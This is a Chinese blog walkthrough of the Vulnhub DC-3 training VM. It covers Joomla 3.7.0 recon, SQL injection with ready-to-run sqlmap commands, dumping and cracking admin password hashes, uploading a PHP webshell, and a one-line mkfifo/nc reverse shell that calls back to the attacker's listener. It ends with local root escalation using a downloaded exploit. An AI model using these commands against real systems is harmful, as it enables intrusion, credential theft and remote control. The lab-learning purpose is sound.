看完这篇 教你玩转渗透测试靶机vulnhub——DC3

置顶 已于 2023-06-26 12:36:03 修改
阅读量1.8w 收藏 81
点赞数 42
分类专栏: 渗透测试 # Vulnhub靶场 文章标签: vulnhub靶场 DC-3 joomscan工具使用 CMS 提权
于 2022-03-23 15:43:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Aluxian_/article/details/123676768
版权

Vulnhub靶机DC3渗透测试详解

Vulnhub靶机介绍:

vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。

从靶机DC-3开始,只有一个最终的flag,只有拿到root权限才可以发现最终的flag。

Vulnhub靶机下载:

官网地址:http://www.five86.com/downloads/DC-3-2.zip

Vulnhub靶机安装:

下载好了把安装包解压 然后试用VMware即可。
在这里插入图片描述
在这里插入图片描述

Vulnhub靶机漏洞详解:

①:信息收集:

kali里使用netdiscover发现主机
在这里插入图片描述
渗透机:kali IP :172.16.5.42 靶机IP :172.16.5.24

使用命令:nmap -sS -sV -A -n 172.16.5.24

在这里插入图片描述
就开了一个80端口,直接访问发现是Joomla 使用网站指纹工具whatweb识别靶机网址使用的web服务、系统版本、CMS系统等。

Joomla!是一套全球知名的内容管理系统,Joomla!是使用PHP语言加上MySQL数据库所开发的软件系统。
在这里插入图片描述
在这里插入图片描述
这里需要使用一个工具joomscan 因为最新kali没有 又去装了一下又学习了一下。

(JoomScan):是一个开源项目,旨在自动执行Joomla CMS部署中的漏洞检测和可靠性保证任务。该工具在Perl中实现,可以无缝轻松地扫描Joomla安装,同时通过其轻量级和模块化架构留下最小的占地面积。它不仅可以检测已知的攻击性漏洞,还能够检测到许多错误配置和管理员级别的缺陷,这些缺陷可被攻击者利用来破坏系统。

git clone https://github.com/rezasp/joomscan.git  ##下载源码

cd joomscan  ##进入路径

perl joomscan.pl ##运行

一些最基本的参数 使用命令:perl joomscan.pl --url 172.16.5.24
在这里插入图片描述
在这里插入图片描述
通过上面的 探测我们可以知道Joomla 的版本 3.7.0 以及CMS的后台地址/administrator/ (说明工具还是强大的,爆赞👍)

②:漏洞发现:

通过上面信息收集的基本信息我们可以 去发现漏洞 使用工具searchsploitJoomla 的版本号即可。
在这里插入图片描述
这里回显的是一个SQL注入的漏洞 根据这个思路我们需要对网页进行SQL注入的一些操作。

cp /usr/share/exploitdb/exploits/php/webapps/42033.txt joomscan-1.txt         

cat joomscan-1.txt

在这里插入图片描述

③:SQL注入:

直接上sqlmap吧 sqlmap就是自动化检测sql的工具,发现了五个数据库。

sqlmap -u "http://172.16.5.24/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

在这里插入图片描述

sqlmap -u "http://172.16.5.24/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --current-db -p list[fullordering]

在这里插入图片描述

sqlmap -u "http://172.16.5.24/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" --tables  -p list[fullordering] #列出表

在这里插入图片描述
注入查询#__users表 发现有6列 知道列了就可以进行下一步字段的操作

sqlmap -u "http://172.16.5.24/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" --columns  -p list[fullordering]

在这里插入图片描述
注入查询#__users表的name、password字段

sqlmap  -u "http://172.16.5.24/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" -C "name,password" --dump  -p list[fullordering]

在这里插入图片描述
在桌面随便建一个文件把password的hash密文放进去 然后使用john进行爆破 密码:snoopy

vim joomla-admin-hash #随便取个名字就就可以了

在这里插入图片描述

④:文件上传:

访问172.16.5.24/administrator/
在这里插入图片描述
登入进去输入:http://172.16.5.24/templates/beez3/html/shell.php 上传一个shell.php 然后执行 然后使用蚁剑连接🔗
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
进入虚拟终端看了一下权限 发现权限还是比较小 所以需要提权
在这里插入图片描述

⑤:提权:

编写反弹shell的PHP代码 监听4444端口,并执行脚本文件,将反弹靶机shell到kali

nc  -lvp 4444   #设置监听端口

<?php 
system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 172.16.5.42 4444 >/tmp/f');
?>

在这里插入图片描述
在这里插入图片描述
使用searchsploit工具查找Ubuntu 16.04的提权漏洞
在这里插入图片描述

cp /usr/share/exploitdb/exploits/linux/local/39772.txt ubuntu.txt

cat ubuntu.txt

在这里插入图片描述
然后根据他给的地址直接 wget 下载 但是我这边不行报错了 可能是访问不到github,所以只能windows 下载然后把他拖进去 不过问题不大 这也是一种思路,
在这里插入图片描述
使用命令:python -c "import pty;pty.spawn('/bin/bash')"

因为权限不够所以不能用蚁剑把39772的文件传上去,只能把39772.放到自己kali的网页上面了 然后在开个apache服务。
(DC-3是没有外网的所以我用的这种方法,方法有很多种大家可以多尝试,我也是第一次打,比较菜,大佬绕过就好!)
在这里插入图片描述
在这里插入图片描述
别忘了开启apache服务 :server apacher2 restart
在这里插入图片描述
使用命令:wget http://172.16.5.24/exploit.tar
在这里插入图片描述
然后解压:tar -xvf exploit.tar 最后运行提权文件 然后 进入root 看flag即可。
在这里插入图片描述
在这里插入图片描述
至此获取到了flag,渗透测试结束。

Vulnhub靶机渗透总结:

这是做的第四个靶场了,学习的知识点和一些细节就是 :
1.需要注意的细节就是 DC-3 不能访问github 然后就不能直接下载提权的文件
需要开个apache服务然后把文件放上面 在使用wget下载

新知识点:
①:学习了joomscan工具的使用(工具很强大!!)
②:学习了sqlmap 工具的使用 特别方便
③:学习了编写反弹shell 这个比较难吧因为也是第一次学习了好久
最后 自己也会把这系列的靶机继续更新,创作不易 希望对大家有所帮助!!

落寞的魚丶
关注
专栏目录
DC-3靶机
m0_62094846的博客
02-20 3163
ifconfig nmap 192.168.61.0/24 nmap -A -p- 192.168.131 使用网站指纹工具whatweb识别靶机网址使用的web服务、系统版本、CMS系统等 whatweb http://192.168.61.131 发现靶机使用Joomla内容管理系统 使用joomscan扫描工具扫描Joomla相关配置内容、已知漏洞等等 扫描后得知Joomla版本3.7.0,管理员登录页面,及一些可以访问的网站目录 joomscan --u 192.168.61
Vulnhub靶机:DC-3渗透详细过程
IerkeU的博客
02-21 2551
前情提要 靶场地址:https://www.vulnhub.com/entry/dc-32,312/ DC-3是一个适合初学者的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个靶场与之前的不同,只有一个入口点和一个flag,并且没有任何线索。 靶场只需要简单的下载,解压,打开并将其导入到VMware即可(我将其网络配置为NAT模式,保证机器与kali在同一个网段下) nmap -sP 192.168.
vulnhub靶机DC-3
travelnight的博客
03-10 4870
原知识星球老文搬运 拿到靶机之后导入到virtualBOX里面。 1. nmap扫描主机存活,192.168.56.104 有个80端口,不放心的话可以用masscan。 2. 直接访问看下,这里提示只有一个flag,直接拿到root权限。 3. 习惯性的上一下dirbuster。发现访问到不存在的URL时候服务器也是返回200OK,这个扫描就没有什么参考价值了。 4.御剑扫描一下,发现后台页面。这个是joomlaCMS 5.参考了下知乎的这个joomla渗透,https
W34KN3SS靶机渗透测试
最新发布
weixin_58786230的博客
08-11 421
【代码】W34KN3SS靶机渗透测试
vulnhub-DC3
weixin_55129870的博客
05-15 532
开机出现错误,解决方法。趁着更改网络连接方式为nat模式。 开启kali.探测主机存活 nmap -sP 192.168.44.0/24 DC3IP: 192.168.44.143 扫描主机开放服务 nmap -A 192.168.44.143 -p 1-65535 只开放80端口,直接浏览器访问 指纹识别 whatweb http://192.168.44.143/ 结果显示使用apache平台,...
vulnhub靶机dc-3
m0_52328368的博客
08-14 1355
dc-3靶机
vulnhub靶机试炼场之DC-3
Mrs_H的博客
01-05 2484
DC-3靶机渗透实战 一.前言 关于这次的靶机渗透文章我已经托更很久了,一直都没有时间来好好看一下这个靶机。最近也是到了放假的时候,也会陆续的把之前期末复习期间欠下的东西好好回顾一下。在上个月里也没有好好的看过靶场里面的题目,这个月打算趁年前把ssrf的坑填了,顺便也想把文件上传这方面的靶场习题开个坑,以前只有在打比赛的时候才会着重看的漏洞就是文件上传,关于其中的奇技淫巧还有着太多不熟悉的地方,有时间要好好看一下了。 二.正文 这次的靶机只有一个flag所以这次就不以flag的先后顺序做时间线了,就以渗透的
渗透测试学习之靶机DC-3
xdbzdgx的博客
11-12 4982
1.下载靶机 本篇文章是DC靶机系列的第三篇,针对的是靶机DC-3,建议感兴趣的读者从DC-1开始练习,详细内容可以看我之前的文章。 DC-3的下载地址为DC: 3.2 ~ VulnHub。三个地址建议使用磁力下载,比较快。下载后解压为.ova文件,该格式可直接在VMware上打开,如果显示打开失败,点击重试即可成功,如果仍无法成功可百度、谷歌解决。 需要说明的是DC-3相较前两个靶机,它只有一个flag,便是最后一个flag,没有多余的提示了。 在VMware加载成功之后显示如下界面: 默.
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
vulnhub靶场DC-3
qq_58091216的博客
01-08 1404
如果您的网站正在运行 Joomla,您可以对您的网站使用 JoomScan 实用程序来发现漏洞或仅提供有助于攻击您网站的一般信息。漏洞扫描器(JoomScan)是一个开源项目,其主要目的是实现漏洞检测的自动化,以增强Joomla CMS开发的安全性。与以前的 DC 版本一样,这个版本是为初学者设计的,尽管这一次只有一个标志,一个入口点,根本没有任何线索。Linux 技能和对 Linux 命令行的熟悉是必须的,对基本渗透测试工具的一些经验也是必须的。我们可以看到用户名爆破出来了,密码是加密的,我们进行解密。
DC3靶机
PigLL的博客
08-11 494
## 关于DC3 靶机实验 1.信息收集: 2.网站信息 在浏览器中访问DC3的IP 利用工具kali中的nikto做一个简单的信息识别 通过扫描可以看到一些目录 然后通过浏览器可以访问 然后利用joomla专用的扫描工具joomscan扫描 发现了joomla的版本和一些目录 通过kali中的工具searchsploit扫描joomla 3.7.0版本存在的漏洞 通过扫描发现了一个42033.txt文件 通过searchsploit 将42033文件下载到当前目录 查看42033文件 发现
靶机DC-3—WP
m0_66638011的博客
05-17 1758
DC系列靶机是一系列专门为渗透测试和网络安全实验室设计的虚拟机器。这些靶机提供了一系列不同的漏洞和攻击场景,使渗透测试者可以在这些环境下测试自的技能和工具DC系列靶机包含多个不同的主题,例如各种操作系统的漏洞,Web应用程序安全和无线网络安全等。它们对初学者和专业人士都有很大的价值,因为它们可以帮助他们了解安全漏洞和如何利用它们进行渗透测试
DC-3靶机攻略
weixin_47311099的博客
07-16 462
DC-3攻略 信息收集 主机发现 nmap -sP 192.168.64.0/24 -oN nmap.sP 端口扫描 nmap -A 192.168.64.137 -p 1-65535 -oN NMAP_A 发现开放80端口 访问80 漏洞利用 安装joomla扫描工具joomscan apt-get install joomscan 查找cms版本漏洞 searchsploit Joomla 3.7.0 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-WEXzKK0O-
Vulnhub DC-3
Pai_Space
02-15 274
192.168.37.132 This time, there is only one flag, one entry point and no clues. To get the flag, you'll obviously have to gain root privileges. How you get to be root is up to you - and, obviously, the system. Good luck - and I hope you enjo...
VulnHub DC3
baynk的博客
05-16 305
0x00 靶机环境 下载地址1:https://www.vulnhub.com/entry/dc-32,312/ 下载地址2 dc-3.2:https://pan.baidu.com/s/1LyKZbgQiQsSqpMlY8kNUBw 提取码: z4pv 下载地址3 dc-3:https://pan.baidu.com/s/1lt3ek4ra2jHbR4HVEyrk7g 提取码: j8cg 只有一个flag了,同时也只有一个切入点,而且官网上DC3好像升到了DC3-2,不知道到和以前的区别大不大,我这里就
vulnhub靶机——raven: 2
09-03
Raven: 2是一台中级难度的boot2root虚拟机,目标是获取四个标志(flag)。Raven Security在多次遭受入侵后,采取了额外措施来加固他们的web服务器,以防止黑客入侵。你可以在Vulnhub上找到Raven: 2的ova文件,并使用VirtualBox打开。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [vulnhub靶机raven2](https://blog.csdn.net/weixin_52450702/article/details/127811079)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [vulnhub靶机——RAVEN: 2](https://blog.csdn.net/qq_44029310/article/details/126491848)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)](https://download.csdn.net/download/weixin_38717843/14052717)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论 14
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

落寞的魚丶

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值